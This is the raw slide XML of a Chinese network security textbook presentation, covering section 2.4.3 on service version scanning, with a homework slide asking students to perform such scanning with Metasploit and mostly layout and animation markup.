              <a:t>2.4.3 服务版本扫描</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>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1+#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="8" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="2"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="9" presetID="2" presetClass="entr" presetSubtype="2" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="10" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="7"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="11" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="7"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="1+#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="12" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="7"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="13" presetID="2" presetClass="entr" presetSubtype="2" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="14" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="12"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="15" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="12"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="1+#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="16" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1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 name="标题 17"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="480060" y="713740"/>
            <a:ext cx="3855085" cy="864235"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" sz="4400">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>【作业布置】</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="101" name="文本框 100"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="649605" y="1952625"/>
            <a:ext cx="9040495" cy="706755"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr marL="742950" indent="-742950" algn="l">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" sz="4000">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>用Metasploit进行服务版本扫描</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" sz="4000">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" sz="4000" b="0">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="矩形 10"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-5715" y="127635"/>
            <a:ext cx="367030" cy="388620"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill>
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="012D86"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="0E2557"/>
              </a:gs>
            </a:gsLst>
            <a:lin ang="5400000" scaled="0"/>
          </a:gra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12" name="矩形 11"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId3"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="403860" y="127635"/>
            <a:ext cx="76200" cy="387985"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="0070C0"/>
          </a:soli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13" name="文本占位符 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId4"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="522605" y="57150"/>
            <a:ext cx="4389755" cy="558165"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1055"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr sz="2955" b="1" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="723265" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2530" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1205230" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2110" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="168783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4pPr>
            <a:lvl5pPr marL="216979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5pPr>
            <a:lvl6pPr marL="26517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6pPr>
            <a:lvl7pPr marL="31343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7pPr>
            <a:lvl8pPr marL="361632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8pPr>
            <a:lvl9pPr marL="409829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9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2.4.3 服务版本扫描</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition>
    <p:random/>
  </p:transition>
  <p:timing>
    <p:tnLst>
      <p:par>
        <p:cTn id="1" dur="indefinite" restart="never" nodeType="tmRoot"/>
      </p:par>
    </p:tnLst>
  </p:timing>
</p:sld>
</file>

<file path=ppt/slides/slide2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TextBox 7"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1354455" y="2427605"/>
            <a:ext cx="9048750" cy="7385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spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" fontAlgn="auto">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4800" spc="-300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
                <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="LilyUPC" panose="020B0604020202020204" pitchFamily="34" charset="-34"/>
                <a:sym typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>本章内容结束</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4800" spc="-300" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
              <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:cs typeface="LilyUPC" panose="020B0604020202020204" pitchFamily="34" charset="-34"/>
              <a:sym typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="图片 4"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="9500870" y="5334000"/>
            <a:ext cx="2261870" cy="1000125"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>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8" presetClass="entr" presetSubtype="0" accel="50000" fill="hold" grpId="0" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="lt">
                                    <p:tmPct val="50000"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="6" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="27"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="7" dur="114" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="27"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.rotation</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="-45.0"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="8" dur="114" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="114"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="27"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.rotation</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="-45"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="69900">
                                          <p:val>
                                            <p:fltVal val="45"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="9" dur="114" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="27"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y-1"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y-(0.354*#ppt_w-0.172*#ppt_h)"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="10" dur="39" decel="50000" autoRev="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="114"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="27"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y-(0.354*#ppt_w-0.172*#ppt_h)"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y-(0.354*#ppt_w-0.172*#ppt_h)-#ppt_h/2"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="11" dur="34" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="216"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="27"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y-(0.354*#ppt_w-0.172*#ppt_h)"/>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 grpId="0"/>
    </p:bldLst>
  </p:timing>
</p:sld>
</file>

<file path=ppt/slides/slide2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图片 7" descr="V-136038-F72FEC97O"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1">
            <a:alphaModFix amt="10000"/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="159385" y="-137795"/>
            <a:ext cx="12192000" cy="6858000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="图片 1" descr="D:\用户目录\Desktop\223.png223"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="216535" y="1415415"/>
            <a:ext cx="6368415" cy="4027805"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="矩形 259"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5576570" y="1704340"/>
            <a:ext cx="4876800" cy="1009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86694" tIns="43347" rIns="86694" bIns="43347">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="3200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="742950" indent="-285750">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="–"/>
              <a:defRPr sz="2800">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204" charset="0"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1143000" indent="-228600">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2400">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204" charset="0"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1600200" indent="-228600">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>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4pPr>
            <a:lvl5pPr marL="2057400" indent="-228600">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>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9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr algn="dist">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="6000" b="1" cap="all" dirty="0">
                <a:gradFill>
                  <a:gsLst>
                    <a:gs pos="0">
                      <a:srgbClr val="007BD3"/>
                    </a:gs>
                    <a:gs pos="100000">
                      <a:srgbClr val="034373"/>
                    </a:gs>
                  </a:gsLst>
                  <a:lin scaled="0"/>
                </a:gradFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>网络安全技术</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="6000" b="1" cap="all" dirty="0">
              <a:gradFill>
                <a:gsLst>
                  <a:gs pos="0">
                    <a:srgbClr val="007BD3"/>
                  </a:gs>
                  <a:gs pos="100000">
                    <a:srgbClr val="034373"/>
                  </a:gs>
                </a:gsLst>
                <a:lin scaled="0"/>
              </a:gradFill>
              <a:effectLst>
                <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                  <a:srgbClr val="000000">
                    <a:alpha val="43137"/>
                  </a:srgbClr>
                </a:outerShdw>
              </a:effectLst>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="20" name="直接连接符 19"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="5634990" y="2847975"/>
            <a:ext cx="4752340" cy="3810"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="0070C0"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="1">
            <a:schemeClr val="accent1"/>
          </a:lnRef>
          <a:fillRef idx="0">
            <a:schemeClr val="accent1"/>
          </a:fillRef>
          <a:effectRef idx="0">
            <a:schemeClr val="accent1"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="tx1"/>
          </a:fontRef>
        </p:style>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="矩形 259"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="762000" y="451485"/>
            <a:ext cx="4021455" cy="301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86694" tIns="43347" rIns="86694" bIns="43347">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="3200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="742950" indent="-285750">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="–"/>
              <a:defRPr sz="2800">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204" charset="0"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1143000" indent="-228600">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2400">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204" charset="0"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1600200" indent="-228600">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>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4pPr>
            <a:lvl5pPr marL="2057400" indent="-228600">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>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9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="70000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2000" cap="all" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>广东省首批十四五规划教材</a:t>
            </a:r>
